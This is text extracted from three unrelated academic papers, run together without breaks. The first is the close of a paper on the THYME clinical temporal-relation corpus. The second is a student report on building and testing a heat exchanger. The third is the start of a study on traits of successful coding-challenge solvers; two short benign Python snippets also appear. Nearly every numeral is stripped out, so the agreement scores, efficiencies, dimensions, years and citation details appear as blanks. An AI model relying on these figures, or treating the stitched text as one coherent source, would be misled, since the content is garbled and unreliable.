here- released subset of the thyme colon cancer corpus, which includes clinical notes and pathology reports for patients diagnosed with colon cancer for a total of documents. each note was annotated by a pair of graduate or undergraduate students in linguistics at the university of colorado, then adju- dicated by a domain expert. these clinical narratives were sampled from the ehrs of a major healthcare center (the mayo clinic). they were deidentified for all patient-sensitive information; however, original dates were retained. . descriptive statistics table presents the raw counts for events, temporal expressions and links in the adjudicated gold anno- tations. table presents the number and percentage of tlinks by type in the adjudicated relations gold annotations. annotation type f -score alpha event . . timex . . link: participants only . . link: participants+type . . link: contains . . table : iaa (f -score and alpha) by annotation type event property f -score alpha doctimerel . . cont.aspect . . cont.modality . . table : iaa (f -score and alpha) for event properties . 
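The closure-based inference described in the preceding sections, which is also incorporated into the agreement computation reported below, can be illustrated in a few lines. The sketch only chains links of the same type (BEFORE with BEFORE, CONTAINS with CONTAINS); a full interval-calculus closure would also compose mixed relation types, so this is a deliberate simplification, and the placeholder anchor name stands in for the specific date from the surgery example above, which is elided in the source text.

```python
def close_tlinks(tlinks):
    """Transitive closure over same-typed BEFORE / CONTAINS triples.

    tlinks: iterable of (source, relation, target) triples.  Returns the
    explicit triples plus everything inferable from chains such as
    A BEFORE B, B BEFORE C  =>  A BEFORE C.  Composition of mixed relation
    types (e.g. BEFORE with CONTAINS) is omitted for brevity.
    """
    closed = set(tlinks)
    changed = True
    while changed:
        changed = False
        for a, rel1, b in list(closed):
            for c, rel2, d in list(closed):
                if b == c and rel1 == rel2 and (a, rel1, d) not in closed:
                    closed.add((a, rel1, d))
                    changed = True
    return closed

# Container nesting from the surgery example (placeholder anchor name).
explicit = {("visit_date", "CONTAINS", "surgery"),
            ("surgery", "CONTAINS", "incision"),
            ("incision", "CONTAINS", "bled")}

inferred = close_tlinks(explicit) - explicit
assert ("visit_date", "CONTAINS", "bled") in inferred
```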
inter-annotator agreement we report inter-annotator agreement (iaa) results on the thyme corpus. each note was annotated by two independent annotators. the final gold standard was produced after disagreement adjudication by a third annotator was performed. we computed the iaa as f -score and krippen- dorff’s alpha (krippendorff, ) by applying clo- sure, using explicitly marked temporal relations to identify others that are not marked but exist implicitly. in the computation of the iaa, inferred-only tlinks do not contribute to the score, matched or unmatched. for instance, if both annotators mark a before b and b before c, to prevent artificially inflating the agreement score, the inferred a before c is ignored. likewise, if one annotator marked a before b and b before c and the other annotator did not, the inferred a before c is not counted. however, if one annotator did explicitly mark a before c, then an equivalent inferred tlink would be used to match it. event and timex iaa was generated based on exact and overlapping spans, respectively. these results are reported in table . the thyme corpus also differs from iso- timeml in terms of event properties, with the addition of doctimerel, contextualmodality and contextualaspect. iaa for these properties is in table . . baseline systems to get an idea of how much work will be neces- sary to adapt existing temporal information extrac- tion systems to the clinical domain, we took the freely available cleartk-timeml system (bethard, ), tempeval thyme corpus p r f p r f timex . . . . . . event . . . . . . doctimerel - - - . . . link . . . . . . event-timex - - - . . . event-event - - - . . . table : performance of cleartk-timeml models, as reported in the tempeval competition, and as applied to the thyme corpus development set. which was among the top performing systems in tempeval (uzzaman et al., ), and eval- uated its performance on the thyme corpus. cleartk-timeml uses support vector machine classifiers trained on the tempeval training data, employing a small set of features including character patterns, tokens, stems, part-of-speech tags, nearby nodes in the constituency tree, and a small time word gazetteer. for events and timex s, the cleartk-timeml system could be applied di- rectly to the thyme corpus. for doctimerels, the relation for an event was taken from the tlink between that event and the document creation time, after mapping includes to overlap. events with no such tlink were assumed to have a doc- timerel of overlap. for other temporal relations, includes was mapped to contains. results of this system on tempeval and the thyme corpus are shown in table . for time ex- pressions, performance when moving to the clinical data degrades about %, from f of . to . . for events, the degradation is much larger, about %, from . to . , most likely because of the large number of clinical symptoms, diseases, disor- ders, etc. which have never been observed by the system during training. temporal relations are a bit more difficult to compare because tempeval lumped doctimerel and other temporal relations together and had several differences in their evaluation met- ric . however, we at least can see that performance of the cleartk-timeml system on temporal rela- tions is low on clinical text, achieving only f of . . these results suggest that clinical narratives do the tempeval evaluation metric penalized systems for parts of the text that were not examined by annotators, and used different variants of closure-based precision and recall. 
indeed present new challenges for temporal informa- tion extraction systems, and that having access to domain specific training data will be crucial for ac- curate extraction in the clinical domain. at the same time, it is encouraging that we were able to apply existing iso-timeml-based systems to our corpus, despite the several extensions to iso-timeml that were necessary for clinical narratives. discussion contains plays a large role in the thyme cor- pus, representing % of tlink annotations made, compared with only . % for overlap, the second most frequent type. we also see that before links are relatively less common than overlap and con- tains, illustrating that much of the temporal ordering on the timeline is accomplished by using many ver- tical links (contains, overlap) to build contain- ers, and few horizontal links (before, begins-on, ends-on) to order them. iaa on events and temporal expressions is strong, although differentiating implicit events (which should not be marked) from explicit, mark- able events remains one of the biggest sources of disagreement. when compared to the data from the i b challenge (sun et al., b), our iaa figures are quite similar. even with our more com- plex schema, we achieved an f -score of . for events (compared to the i b score of . for par- tial match). for timex s, our f -score was . , compared to an f -score of . for i b . tlinking medical events remains a very diffi- cult task. by using our narrative container approach to constrain the number of necessary annotations and by eliminating often-confusing inverse relations (like ‘after’ and ‘during’) (neither of which were done for the i b data), we were able to significantly improve on the i b tlink span agreement f -score of . , achieving an agreement score of . for all links across our corpus. the majority of remaining an- notator disagreement comes from different opinions about whether any two events require an explicit tlink between them or an inferred one, rather than what type of tlink it would be (e.g. before vs. contains). although our results are still signifi- cantly higher than the results reported for i b , and in line with previously reported general news figures, we are not satisfied. improving iaa is an important goal for future work, and with further training, speci- fication, experience, and standardization, we hope to clarify contexts for explicit tlinks. news-trained temporal information extraction sys- tems see a significant drop in performance when ap- plied to the clinical texts of the thyme corpus. but as the corpus is an extension of iso-timeml, future work will be able to train iso-timeml compliant systems on the annotations of the thyme corpus to reduce or eliminate this performance gap. some applications that our work may enable in- clude ( ) better understanding of event semantics, such as whether a disease is chronic or acute and its usual natural history, ( ) typical event duration for these events, ( ) the interaction of general and domain-specific events and their importance in the fi- nal timeline, and, more generally, ( ) the importance of rough temporality and narrative containers as a step towards finer-grained timelines. we have several avenues of ongoing and future work. first, we are working to demonstrate the utility of the thyme corpus for training machine learning models. we have designed support vector machine models with constituency tree kernels that were able to reach an f -score of . 
on an event-timex narrative container identification task (miller et al., ), and we are working on training models to identify events, times and the remaining types of temporal relations. second, as per our motivating use cases, we are working to integrate this annotation data with timeline visualization tools and to use these annotations in quality-of-care research. for example, we are using temporal reasoning built on this work to investigate the liver toxicity of methotrexate across a large corpus of ehrs (lin et al., under review)]. finally, we plan to explore the application of our notion of an event (anything that should be visible on a domain-appropriate timeline) to other domains. it should transfer naturally to clinical notes about other (non-cancer) conditions, and even to other types of clinical notes, as certain basic events should always be included in a patient’s timeline. applying our notion of event to more distant domains, such as legal opinions, would require first identifying a consensus within the domain about which events must appear on a timeline. conclusion much of the information in clinical notes critical to the construction of a detailed timeline is left implicit by the concise shorthand used by doctors. many events are referred to only by a term such as “tu- mor”, while properties of the event itself, such as “intermittent”, may not be specified. in addition, the ordering of events on a timeline is often left to the reader to infer, based on domain-specific knowledge. it is incumbent upon the annotation guideline to in- dicate that only informative event orderings should be annotated, while leaving domain-specific order- ings to post-annotation inference. this document has detailed our approach to adapting the existing iso-timeml standard to this recovery of implicit information, and defining guidelines that support an- notation within this complex domain. our guide- lines, as well as the annotated data, are available at http://thyme.healthnlp.org, and the full corpus has been proposed for use in a semeval shared task. acknowledgments the project described is supported by grant num- ber r lm and u lm from the na- tional library of medicine. the content is solely the responsibility of the authors and does not necessarily represent the official views of the national library of medicine or the national institutes of health. we would also like to thank dr. piet c. de groen and dr. brad erickson at the mayo clinic, as well as dr. william f. styler iii, for their contributions to the schema and to our understanding of the intricacies of clinical language. references james f allen. . maintaining knowledge about temporal intervals. communications of the acm, ( ): – . emmon bach. . the algebra of events. linguistics and philosophy, ( ): – . steven bethard. . cleartk-timeml: a minimalist ap- proach to tempeval . in second joint conference on lexical and computational semantics (*sem), vol- ume : proceedings of the seventh international work- shop on semantic evaluation (semeval ), pages – , atlanta, georgia, usa, june. association for computational linguistics. olivier bodenreider. . the unified medical language system (umls): integrating biomedical terminology. nucleic acids research, (database issue):d –d , january. philip bramsen, pawan deshpande, yoong keok lee, and regina barzilay. . finding temporal order in discharge summaries. in amia annual symposium proceedings, volume , page . american medical informatics association. carlo combi, yuval shahar, et al. . 
temporal reason- ing and temporal data maintenance in medicine: issues and challenges. computers in biology and medicine, ( ): – . robert h dolin. . modeling the temporal complex- ities of symptoms. journal of the american medical informatics association, ( ): – . george hripcsak, nicholas d soulakis, li li, frances p morrison, albert m lai, carol friedman, neil s cal- man, and farzad mostashari. . syndromic surveil- lance using ambulatory electronic health records. jour- nal of the american medical informatics association, ( ): – . ann k irvine, stephanie w haas, and tessa sullivan. . tn-ties: a system for extracting temporal infor- mation from emergency department triage notes. in amia annual symposium proceedings, volume , page . american medical informatics association. elpida t keravnou. . temporal abstraction of med- ical data: deriving periodicity. in intelligent data analysis in medicine and pharmacology, pages – . springer. klaus h. krippendorff. . content analysis: an introduction to its methodology. sage publications, inc, third edition edition, april. chen lin, elizabeth karlson, dmitriy dligach, mon- ica ramirez, timothy miller, huan mo, natalie braggs, andrew cagan, joshua denny, and guer- gana. savova. under review. automatic identification of methotrexade-induced liver toxicity in rheumatoid arthritis patients from the electronic medical records. journal of the medical informatics association. john mccarthy. . actions and other events in sit- uation calculus. in proceedings of the international conference on principles of knowledge representation and reasoning, pages – . morgan kaufmann publishers; . stéphane m meystre, guergana k savova, karin c kipper- schuler, john f hurdle, et al. . extracting infor- mation from textual documents in the electronic health record: a review of recent research. yearb med inform, : – . timothy miller, steven bethard, dmitriy dligach, sameer pradhan, chen lin, and guergana savova. . dis- covering temporal narrative containers in clinical text. in proceedings of the workshop on biomedical natural langua ge processing, pages – , sofia, bulgaria, august. association for computational lin- guistics. eleni miltsakaki, rashmi prasad, aravind joshi, and bon- nie webber. . the penn discourse treebank. in in proceedings of lrec . massimo poesio. . discourse annotation and seman- tic annotation in the gnome corpus. in in proceedings of the acl workshop on discourse annotation. james pustejovsky and amber stubbs. . increasing informativeness in temporal annotation. in proceedings of the th linguistic annotation workshop, pages – . association for computational linguistics. james pustejovsky, robert knippen, jessica littman, and roser sauri. . temporal and event information in natural language text. language resources and evalu- ation, ( - ): – . james pustejovsky, kiyong lee, harry bunt, and laurent romary. . iso-timeml: an international standard for semantic annotation. in proceedings of the seventh international conference on language resources and evaluation (lrec ), valletta, malta. angus roberts, robert gaizauskas, mark hepple, george demetriou, yikun guo, and ian roberts. . build- ing a semantically annotated corpus of clinical texts. journal of biomedical informatics, ( ): – . guergana savova, steven bethard, will styler, james mar- tin, martha palmer, james masanz, and wayne ward. . towards temporal relation discovery from the clinical narrative. in amia annual symposium pro- ceedings, volume , page . american medical informatics association. 
tessa sullivan, ann irvine, and stephanie w haas. . it’s all relative: usage of relative temporal expressions in triage notes. proceedings of the american society for information science and technology, ( ): – . weiyi sun, anna rumshisky, and ozlem uzuner. a. evaluating temporal relations in clinical text: i b challenge. journal of the american medical informat- ics association. weiyi sun, anna rumshisky, and ozlem uzuner. b. evaluating temporal relations in clinical text: i b challenge. journal of the american medical informat- ics association, ( ): – . alexander turchin, maria shubina, eugene breydo, merri l pendergrass, and jonathan s einbinder. . comparison of information content of structured and narrative text data sources on the example of medica- tion intensification. journal of the american medical informatics association, ( ): – . naushad uzzaman, hector llorens, leon derczynski, james allen, marc verhagen, and james pustejovsky. . semeval- task : tempeval- : evaluating time expressions, events, and temporal relations. in sec- ond joint conference on lexical and computational semantics (*sem), volume : proceedings of the sev- enth international workshop on semantic evaluation (semeval ), pages – , atlanta, georgia, usa, june. association for computational linguistics. marc verhagen. . temporal closure in an annota- tion environment. language resources and evalua- tion, ( ): – . veronika vincze, gyrgy szarvas, richrd farkas, gyrgy mra, and jnos csirik. . the bioscope corpus: biomedical texts annotated for uncertainty, negation and their scopes. bmc bioinformatics, (suppl ): – . ying zhao, george karypis, and usama m. fayyad. . hierarchical clustering algorithms for docu- ment datasets. data mining and knowledge discovery, : – . jiaping zheng, wendy w chapman, rebecca s crowley, and guergana k savova. . coreference resolution: a review of general methodologies and applications in the clinical domain. journal of biomedical informatics, ( ): – . li zhou, simon parsons, and george hripcsak. . the evaluation of a temporal reasoning system in processing clinical discharge summaries. journal of the american medical informatics association, ( ): – . conference full paper template international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - design heat exchanger: optimization and efficiency haifa el-sadi*, joe aitken, jason ganley, david ruyffelaert, cam sweeney wentworth institute of technology huntington, boston, ma, usa *corresponding author: elsadih@wit.edu abstract—modern commercial and residential buildings procure hvac systems, to provide heating and cooling for designed open and enclosed spaces to dissipate throughout the accustomed zones. hvac (heating, ventilating, and air conditioning) systems have become a required industry standard for the construction of new buildings. the objective is the optimization of a heat exchanger model by resolving common system concerns; efficiency, fouling, leakage, dead zones, and vibration. these issues are prevalent in the hvac industry, which are critical to the under-performing heat exchangers. the heat exchanger was tested at only three different wind speeds ( , %, %) to take the temperature readings every minutes to allow for maximal heat transfer. the efficiency of heat exchanger at the specified speeds was determined to be . at %, . at % and . at %. keywords-heat exchanger; efficiency; buildings; design i. introduction mankind is about to install their millionth air conditioner. 
this baffling number creates great opportunity for engineers because behind each air conditioner there is a heat exchanger doing the heavy lifting to bring comfort to billions of people. heat exchangers have sought be an engineering challenge and still after million there are still problems that can be resolved. common problems that heat exchangers endure are fouling, dead zones, and leakage and tube vibrations. fouling is the reduction of performance due to the build of undesired material. this can be the result of corrosion within the heat exchanger and the lack of filtration prior to fluid entering the heat exchanger. dead zones can lead to significant fouling and are sections of the heat exchanger that the flow is notably less compared to the rest of the heat exchanger. in most cases dead zones are the result of baffles that most heat exchangers use. but in most cases the baffles are essential for the heat transfer so eliminating them cannot be discussed. leakage occurs when there is a loss of fluid from the heat exchanger, this results in reduced efficiency. typically, leakage is the result of faulty connections from poor welding or stressed joints. tube vibrations can cause the most significant damage to heat exchanger. this can be the result of very high velocity axial and perpendicular flow applications. in addition to resolving common heat exchanger problems the end goal is to improve the efficiency of the heat exchanger. r.l webb et al. focused on [ ] four design cases: ( ) reduced heat exchanger material; ( ) increased heat duty; ( ) reduced log-mean temperature difference; and ( ) reduced pumping power. the novel method was presented by b. linnhoff et al. [ ], the method is the first to combine sufficient simplicity to be used by hand with near certainty to identify “best” designs, even for large problems. “best” designs feature the highest degree of energy recovery possible with a given number of capital items. previous work [ ] showed that three rough tube applications are presented: . to obtain increased heat exchange capacity; . to reduce the friction power; and . to permit a reduction of heat-transfer surface area. adrian [ ] examined the coupling between losses due to heat transfer across the stream-to stream Δt and losses caused by fluid friction using the concept of heat-exchanger irreversibility. ii. design and analysis solid works was used to design different models of heat exchanger, equation engineering solver (ees) was used for calculations and analysis, the efficient prototype heat exchanger is shown in figure . table shows the dimensions of the inner tube and the properties of the fluid (water). international journal of advanced network, monitoring and controls volume , no. , figure . sectioned solidworks model of shell and tube heat exchanger with copper coil and finned inner wall. table i. internal flow calculations properties of water: properties were found at the average temperature between the surface of the pipe and liquid and a pressure of . n/m , using equation engineering solver (ees) to write the code and solve for the amount of heat transfer. table ii. external flow calculations initially the shell of the heat exchanger was going to be formed using sheet metal. with concerns of burn-through while welding the shell together it was determined that buying hvac duct would reduce manufacturing time and eliminate concerns of sealing the shell together. the second difference between the prototype and the model is the use of fans to send air through the shell. 
initially the plan was to incorporate fans within the shell that would send air through and out the other side. the main concern with this idea was if we were going to be able to vary the fan speed for calculation purposes. it was determined that a " flexible duct was attached from the heat exchanger to the wind turbine in wentworth's fluid dynamics lab where we would be able to vary wind speed during testing. not only did this decision save money it also eliminated doubt from our calculations. the third difference is the overall length of the prototype. this work initially planned to make the shell " long with " diameter. while we kept the diameter the same, the heat exchanger is now " long due to the need for an additional connection piece for the hvac duct that international journal of advanced network, monitoring and controls volume , no. , was not initially incorporated into the solidworks model. iii. manufacturing prototype parts the prototype consists of ten major part that will be assembled into a heat exchanger. the parts consist of the controller, pump, piping, valves, stand, reservoir, coil, slides, shell and caps. out of these nine parts, the stand, reservoir and slides needed to be manufactured in the projects lab. this work manufactured all these parts on the wentworth campus in the manufacturing lab and projects lab. the stand was manufactured in three major steps. first, we bout ¼ inch plywood and drew the dimensions that would sufficiently hold the tube and reservoir tank. the two vertical pieces were measure to the dimensions of ' wide and . ' tall with a " diameter half circle cut at the top to hold the tube in place. the base piece was also dimensioned to be ' wide and ' long to hold the tube at the two ends. a small shelf to hold the pump and valves was dimensions to be ' wide and " long. the second steps consisted of cutting all the pieces. this work used two tools to accurately cut the plywood, a circular and jig saw. the circular saw was used to cut the straight angles while the jig saw was used to cut the " diameter half circles. after the pieces were cut the stand could be assembled. the third step consisted of using angle brackets, screws and the three- stand pieces to assemble the stand. three angle brackets were screwed into each inside portion of the base and vertical pieces with two angle brackets on the outside to ensure stability. the shelf was fastened in a similar manner to the outside of the vertical piece. a. reservoir this work manufactured the reservoir using copper plates, angle brackets, screws, jb weld, and flex seal. first, it the precut copper plates and angled them against each other at degrees to construct an open box, and screed the brackets in place at points per corner. next, with duct taped the outside of the box to ensure a tight seal between the two pieces and applied the jb weld to all the seams. after an hour of curing we applied flex seal to the entire surface of the inside. this sealed between the screws ensuing a waterproof reservoir. b. slides the slides were manufactured using a solidworks model, which was then converted over to a cam file. the milling machines would have taken about hours per slide, so we opted to use the lpm. the process with minutes per part, which was a noticeable efficiency difference. the center hole was a quarter of an inch and was pressed out. the plate was then clamped down into the lpm and the larger holes began to mill. then the circles were cut out from the existing material, with a helix pattern. 
a hole was drilled at both ends of the shell to allow the ends of the coil to protrude out so that we could connect the fluidics tubing. once that was all done the end caps were placed on the ends of the shell which shrank the shell diameter from ” to ". figure . the heat exchanger prototype international journal of advanced network, monitoring and controls volume , no. , after that insulation was put on the whole shell assembly to prevent any possible heat from escaping. with the whole shell finished it was time to put the rest of the manufactured parts together. the shell assembly was placed into the " diameter half circles in the wooden stand so that it could be supported horizontally. the copper reservoir was then placed underneath the shell assembly. fluidics tubing was then connected from one of the ends of the copper coil from the shell to one side of the reservoir tank. this where the water will go after going through the heat exchanger. an overflow hole and tube were made in the reservoir to be directed back towards the sink. electronic valve a was used to pull water from the hot sink water that was stored in a trash car and heated by a bunsen burner. piping from the trash can to electronic valve a, then the valve to the pump was made. electronic valve b was used to pull water from the reservoir tank. piping from the reservoir tank to electronic valve b, then the valve to the pump was made. the final piping from the pump to the inlet part of the coil completed the piping system. figure shows the heat exchanger prototype. figure . the electronic part of the heat exchanger two temperature controllers as shown in figure were used to regulate the opening and closing of the valves. the wires from electronic valve a are connected to controller a. the wires from electronic valve b are connected to controller b. the source connection for the two controllers are to be wired together and connected to a dc source controller supplied by the electrical lab. figure shows testing the heat exchanger. figures , and show the effect of time on the air outlet temperature. figure . testing the heat exchanger figure . time vs. outlet air temperature at % wind speed international journal of advanced network, monitoring and controls volume , no. , figure . time vs. outlet air temperature at % wind speed figure . time vs. outlet air temperature at % wind speed figure . effectiveness vs wind speed initially the heat exchanger was tested with fan speeds starting at % increasing up to % in increments of . however, it was determined that by increasing the fan speed percentage so rapidly there would not be enough time for maximal heat transfer. knowing this, it was determined that the heat international journal of advanced network, monitoring and controls volume , no. , exchanger would be best to test at only three different wind speeds ( , %, %) and to take the temperature readings every minutes to allow for maximal heat transfer. before testing the heat exchanger for the second trial it was hypothesized that since slower fan speeds would allow the air to stay in contact with the inside of the heat exchanger longer the efficiency would be higher. looking at the graphs above this hypothesis was proven to be correct. every minutes the inlet and outlet temperatures of both the air and the water were recorded based on the readings given from the thermocouples. while running the heat exchanger the pump sent the water through the copper coils at a constant velocity of . m/s. 
for the three different fan speed percentages of , , and , the air velocities were measured at . m/s, . m/s, and . m/s. at each fan speed temperature readings were taken, the temperature change between the st and th reading was then used to determine the efficiency of the heat exchanger at the specified air and water velocities with respect to the initial temperatures of both the water and air. by using the same equations that were used to analyse the initial four designs the effectiveness of the heat exchanger at the specified speeds was determined to be . at %, . at % and . at % as shown in figure . iv. conclusion after months of research, designing, building and testing we concluded that the heat exchanger provides an effectiveness that is below average compared to common industrial designs. some variables that may have affected our results are the following; since it is the middle of the summer the outside temperature is quite high making it difficult to determine the true change in temperature since the inlet and outlet temperatures are quite close to one another. if this test was done in the winter are values could potentially be much better. also, the reservoir tank had a hard time maintaining a warm enough temperature so that could start using the water from it rather than main water source. this may be due to the fact that we used flex seal to make sure the tank was water tight. the thermal conductivity of flex seal is much lower than copper which is what the tank is made out of. by spraying it everywhere the thermal conductivity of the tank as a whole might not be as high as thought. overall heat exchanger did what wanted it to and by making these and other modifications the work believe can perform better. acknowledgements this project very much to thank wentworth project lab and professor jackson for their support. references [ ] r.l webb, “performance evaluation criteria for use of enhanced heat transfer surfaces in heat exchanger design”, international journal of heat and mass transfer, volume , pages - . [ ] b. linnhoff and e. hindmarsh, “the pinch design method for heat exchanger networks”, chemical engineering science, volume , pages - . [ ] r.l webb and e.r.g eckert, “application of rough surfaces to heat exchanger design”, international journal of heat and mass transfer volume , pages - . [ ] adrian bejan, “general criterion for rating heat exchanger performance”, international journal heat and mass transfer, volume , pages - . submitted august accepted january published february corresponding author marvin wyrich, marvin.wyrich@iste.uni-stuttgart.de academic editor philipp leitner additional information and declarations can be found on page doi . /peerj-cs. copyright wyrich et al. distributed under creative commons cc-by . open access a theory on individual characteristics of successful coding challenge solvers marvin wyrich, daniel graziotin and stefan wagner institute of software technology, university of stuttgart, stuttgart, germany abstract background. assessing a software engineer’s ability to solve algorithmic programming tasks has been an essential part of technical interviews at some of the most successful technology companies for several years now. we do not know to what extent individual characteristics, such as personality or programming experience, predict the perfor- mance in such tasks. 
decision makers’ unawareness of possible predictor variables has the potential to bias hiring decisions which can result in expensive false negatives as well as in the unintended exclusion of software engineers with actually desirable characteristics. methods. we conducted an exploratory quantitative study with software engineering students to develop an empirical theory on which individual characteristics predict the performance in solving coding challenges. we developed our theory based on an established taxonomy framework by gregor ( ). results. our findings show that the better coding challenge solvers also have better exam grades and more programming experience. furthermore, conscientious as well as sad software engineers performed worse in our study. we make the theory available in this paper for empirical testing. discussion. the theory raises awareness to the influence of individual characteristics on the outcome of technical interviews. should the theory find empirical support in future studies, hiring costs could be reduced by selecting appropriate criteria for preselecting candidates for on-site interviews and potential bias in hiring decisions could be reduced by taking suitable measures. subjects software engineering keywords programming performance, coding challenge, human factors, personality, experience, happiness, academic performance, technical interview introduction some well-known technology companies, including amazon, facebook, google and microsoft, made applicants perform algorithmic programming tasks as part of their technical interview process (mcdowell, ). the performance in these tasks might reveal how good a software engineer is at finding efficient and scalable algorithms to unknown problems and show his or her ability to debug and test a small piece of source code. in the following we refer to these tasks as coding challenges. although aspects such as interpersonal skills play an important role in technical interviews (ford et al., ), coding challenges form an essential part of the interviews and the subsequent evaluation of the candidates. how to cite this article wyrich m, graziotin d, wagner s. . a theory on individual characteristics of successful coding challenge solvers. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:marvin.wyrich@iste.uni-stuttgart.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. the fizz-buzz challenge is a trivial programming task that is used in interviews to filter out programmers with insufficient programming skills. the task is to write a program that prints the numbers from to . but for multiples of three print ‘‘fizz’’ instead of the number and for the multiples of five print ‘‘buzz". for numbers which are multiples of both three and five print ‘‘fizzbuzz’’ (ghory, ). to help candidates preparing for competitions, technical interviews and coding challenges in general, several books, online guides, practicing websites and experience reports exist (e.g., leetcode, ; dumitru, ; mcdowell, ; mongan, kindler & giguère, ). a plethora of material is available that aims to help the reader solve coding challenges successfully. we can see, however, that some software engineers perform better than others in solving coding challenges (google inc., ) and that this difference does not necessarily come all from preparation. 
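The fizz-buzz task mentioned above is small enough to show in full. The exact bounds are elided in the text above; the canonical formulation runs over the numbers 1 to 100. A minimal sketch, written here in Python although any language would serve:

```python
def fizz_buzz(limit=100):
    """Print the numbers 1..limit, substituting Fizz/Buzz/FizzBuzz."""
    for n in range(1, limit + 1):
        if n % 15 == 0:        # multiple of both three and five
            print("FizzBuzz")
        elif n % 3 == 0:       # multiple of three
            print("Fizz")
        elif n % 5 == 0:       # multiple of five
            print("Buzz")
        else:
            print(n)

fizz_buzz()
```

Its value as an interview filter lies less in algorithmic depth than in quickly separating candidates who can translate a simple specification into working code from those who cannot.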
practitioners report that they met computer science graduates who could not even solve simple programming tasks like the fizz-buzz challenge up to developers who aced almost every challenge in the finals of internationally recognized programming competitions. as with programming performance (scacchi, ), individual characteristics are likely to play a very important role in the performance of solving coding challenges. to the best of our knowledge, there is a knowledge gap in the software engineering literature to explain individual factors related to a successful solver. addressing the knowledge gap about individual characteristics of successful coding challenge solvers could be favorable for software companies as well. the companies’ unawareness of possible predictor variables, such as a candidate’s personality, may lead to biased hiring decisions and candidates with actually desired personality traits having less chances of getting hired. being aware of possible predictor variables could therefore help the company to better preselect candidates at an early stage of the interview process as well as identify ways to improve the current workforce. furthermore, failure to understand which characteristics make for a great coding challenge solver might bring failure in a technical interview. job opportunities might get lost. a knowledge gap in a research discipline, as in the case of coding challenges, requires the construction of theories. kajko-mattsson ( ) has argued that software engineering research has been suffering from a syndrome that causes researchers to jump from trend to trend. what happens is that isolated, usually small research problems are solved by one or more papers and then authors jump to a completely different issue. as a result, continues kajko-mattsson ( ), also echoed by johnson, ekstedt & jacobson ( ), the research community lacks a deep, yet basic understanding of the software development life-cycle and the theory behind all software engineering activities. we support the recent request for developing theories in software engineering and we agree with several authors that theory is what software engineering is missing the most (ralph, johnson & jordan, ; johnson et al., ; johnson, ekstedt & jacobson, ; johnson & ekstedt, ; wohlin, Šmite & moe, ). we conducted a study to explore the research question what individual characteristics make a good coding challenge solver? by a quasi-experiment, we empirically developed a theory for predicting the influence of such characteristics on the performance in solving coding challenges. we developed and evaluated the construction of the theory using an established framework for theories in information systems by gregor ( ) which we present in the next section. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. research objectives and contributions the objective of our research is to construct a theory on how individual characteristics of a software engineer predict his or her performance in solving coding challenges. we contribute the following main results: • we found significant negative correlations between the affective state of sadness and the performance in solving coding challenges, as well as between the personality trait of conscientiousness and the performance. • significant positive correlations were found between variables related to the academic performance and the coding challenge performance, as well as between programming experience and performance. 
• these findings were brought together in a type iii theory for predicting (gregor, ). statistically significant results were achieved to offer a theory grounded in data and we offer the theory for testing by future studies. in the following section we provide a summary of related work on coding challenges and describe the scientific basis of our theory construction. in the ‘methods’ section we describe the research methodology in detail, including the design of our study, its sample, used coding challenges, candidates for predictor variables and the analysis procedure. findings of our study are presented in the ‘results’ section, followed by a discussion of the findings, limitations and implications of our study. background a coding challenge (also called programming challenge) is an algorithm and coding problem used to assess a programmer’s problem-solving skills. coding challenges are used in several areas of applications and websites exist that offer different types of coding challenges for learning, practicing, and competing with other users. in most cases, one has to find the most efficient algorithm or any correct algorithm within a limited amount of time. these are the coding challenges relevant to our work. other types of coding challenges include those that can be solved by completing code to win a game or by writing code that passes all given test cases. programming competitions, for example, use coding challenges as tasks for the participants. such competitions enjoy wide popularity. in , the acm international collegiate programming contest (icpc) recorded , students from , universities in countries (baylor university, ). in the same year, the winner of the google code jam prevailed against more than , competitors and won a grand prize of $ , (google inc., ). it is worth noting that bloomfield & sotomayor ( ) found most students were not even motivated by the prizes when participating in the icpc. they understood that participating in programming contests requires skills which are valuable for job interviews where technical questions are asked. research, on the one hand, focuses on the design and scoring of coding challenges in programming competitions. we elaborate on these aspects in the ‘methods’ section where we describe the selection of coding challenges selected for our study and how we wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. scored the solutions. on the other hand, existing research includes the usage of coding challenges for educational purposes such as the automated grading of assignments and teaching algorithms. for example, urness ( ) presented the hypothesis that interview question assignments would be beneficial for students because they require intense practice and are more motivating for the students due to their real-world applicability. in a course on data structures, urness ( ) compared the exam performance of students who were taught with long-term programming assignments with that of students who had to solve short-term interview-question assignments throughout the semester. urness ( ) found that students enrolled in the interview question assignment section had a slightly better average score in the final exam and that the interview question assignments were motivating for students. technical interviews in particular have not been investigated thoroughly in scientific literature yet. we identified only two recent relevant papers. ford et al. 
( ) investigated whether there are company differences in interview criteria and how interviewers interpret criteria for software engineer job candidates. their research was motivated by an existing mismatch of candidates’ expectations of what interviewers assess and what they actually look for in a candidate, which consequently results in lost job opportunities. coding challenges from cracking the coding interview (mcdowell, ) were used as interview questions in mock technical interviews with university students and interviewers from nine different software companies. to evaluate a candidate’s performance, interviewers had to fill out an evaluation form for each candidate which included six criteria and an open response section. after the interviews the authors analyzed the evaluation forms to answer the research questions. first, they found consistent interviewers’ expectations for candidates among most companies. second, interviewers care about technical soundness but place an emphasis on interpersonal skills and effective communication. this finding is consistent with the results of previous studies on the demand for soft skills in software engineering. for example, matturro ( ) found that about % of job advertisements had at least one soft skill listed as a requirement. teamwork and communication skills but also analytical problem-solving skills were some of the most demanded skills. the interviewers in ford et al. ( )’s study noted that candidates had difficulties in communicating their knowledge. however, there is research on how to bridge the gap between what universities teach and what industry demands in terms of interpersonal and communication skills (e.g., teles & de oliveira, ). potentially excessive stress and cognitive load due to technical interviews in which candidates have to solve tasks on a whiteboard reinforce bias in hiring practices. for this reason, behroozi et al. ( ) conducted a study on the differences in stress and cognitive load between solving programming tasks on paper versus on a whiteboard. to assess the difference they used eye measures, measured by a head-mounted eye-tracker and computer vision algorithms. each of the eleven participants completed tasks under each of the two conditions (paper and whiteboard). the authors then conducted debriefing interviews and analyzed the eye tracking data. preliminary results suggest that problem-solving on the whiteboard results in higher cognitive load compared to solving programming problems wyrich et al. ( ), peerj comput. sci., doi . 